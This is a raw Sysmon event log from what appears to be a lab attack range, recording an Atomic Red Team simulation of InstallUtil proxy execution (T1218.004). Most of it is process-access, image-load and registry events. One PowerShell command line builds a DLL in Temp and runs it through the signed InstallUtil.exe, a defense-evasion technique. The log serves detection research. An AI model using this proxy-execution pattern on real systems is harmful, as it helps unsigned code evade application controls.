10341000x800000000000000057456972Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.269{8B6011A9-78B8-618E-27F7-04000000F101}10964520C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c01f5|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e32995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e327fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3ebb92d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e2aa82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+48fb304(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3df002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e53a9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e3593c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e2665c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e62cff(wow64) 734700x800000000000000057456971Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.269{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057456970Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.269{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exeMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71trueMicrosoft CorporationValid 10341000x800000000000000057456969Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.269{8B6011A9-78B8-618E-27F7-04000000F101}10964520C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3566|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e32995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e327fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3ebb92d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e2aa82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+48fb304(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3df002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e53a9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e3593c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e2665c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e62cff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e62987(wow64) 10341000x800000000000000057456968Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.269{8B6011A9-888A-6164-7000-00000000F101}34483444C:\Windows\system32\csrss.exe{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057456967Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.269{8B6011A9-78B8-618E-27F7-04000000F101}10964520C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e32995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e327fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3ebb92d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e2aa82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+48fb304(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3df002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e53a9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e35aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e3593c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e2665c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+3e62cff(wow64) 154100x800000000000000057456966Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:49.272{8B6011A9-78B9-618E-2CF7-04000000F101}7064C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" /logfile= /logtoconsole=false /U C:\Users\ADMINI~1\AppData\Local\Temp\2\T1218.004.dll C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71{8B6011A9-78B8-618E-27F7-04000000F101}1096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly . C:\AtomicRedTeam\atomics\T1218.004\src\InstallUtilTestHarness.ps1 $InstallerAssemblyDir = \""$Env:TEMP\\"" $InstallerAssemblyFileName = \""T1218.004.dll\"" $InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName $CommandLine = \""/logfile= /logtoconsole=false /U `\""$InstallerAssemblyFullPath`\""\"" $ExpectedOutput = 'Constructor_Uninstall_' $TestArgs = @{ OutputAssemblyDirectory = $InstallerAssemblyDir OutputAssemblyFileName = $InstallerAssemblyFileName InvocationMethod = 'Executable' CommandLine = $CommandLine } $ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs if ($ActualOutput -ne $ExpectedOutput) { throw @\"" InstallUtil Uninstall method execution test failure. Installer assembly execution output did not match the expected output. Expected: $ExpectedOutput Actual: $ActualOutput \""@ }} 534500x800000000000000057457704Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.409{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe 734700x800000000000000057457703Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.394{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runteb92aa12#\8a6f1fd5072bb947ca74e50ce391a3d3\System.Runtime.Serialization.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSystem.Runtime.Serialization.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Runtime.Serialization.dllMD5=D2D5D6F2005BB57034DBE003EE9D14A0,SHA256=53E2A4CB20464A9CDCE924F9513882F3DA575DBE10B68C9437EA37C074AEA798false-Unavailable 734700x800000000000000057457702Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.394{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057457701Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.394{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057457700Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.394{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x800000000000000057457699Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.394{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057457698Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.394{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x800000000000000057457697Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.394{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=837B8644B9CE47EC28152E7D764886E0,SHA256=C5BA64473FB38E6B4592EAFA642AF82715CBC676190985D8D8D4150CE840044FtrueMicrosoft WindowsValid 734700x800000000000000057457696Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.394{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\e1c9eb2e855d26a67dbf39e6236430de\System.Xml.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Xml.dllMD5=695EB4BE24FC9DB279F2427D31AD35D4,SHA256=014EDA5BD7025A6F01BEA1F6E05663FE4BCE64FA95B7378EBF9C827991B32E64false-Unavailable 734700x800000000000000057457695Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.394{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\5b778442ed2d60a5de14f752a124bf1a\System.Configuration.ni.dll4.8.4190.0 built by: NET48REL1LAST_BSystem.Configuration.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.dllMD5=9EAA59368783AFE4107F28B6ED8AB1E6,SHA256=BBAC50983BA9B2EDA9CBA8FD0F1DCABF71D24D736A973BA164AF6917A3FC2E7Ffalse-Unavailable 734700x800000000000000057457694Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.394{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\625a7ccd665c33cee4988e3cd136b902\System.Core.ni.dll4.8.4395.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=27741782AAECFE54A201896D93BA1C9A,SHA256=7389517EE682897300DE398245D2C3EE37E5060CF6320138430A8AA86E6E737Bfalse-Unavailable 734700x800000000000000057457693Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.378{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057457692Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.378{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057457691Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.378{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x800000000000000057457690Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.378{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x800000000000000057457689Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.378{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=1D7997E3AFC26B85024D33F835E18056,SHA256=B2376967E156D4971FB66059F6367030AF937943D2EBF80AF856E643B6E95BBFtrueMicrosoft WindowsValid 13241300x800000000000000057457688Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:51.378{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057457687Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:51.378{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 13241300x800000000000000057457686Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:51.378{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057457685Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:51.378{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 10341000x800000000000000057457684Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:51.378{8B6011A9-886B-6164-0B00-00000000F101}6489732C:\Windows\system32\lsass.exe{8B6011A9-78BB-618E-32F7-04000000F101}4080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057457683Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 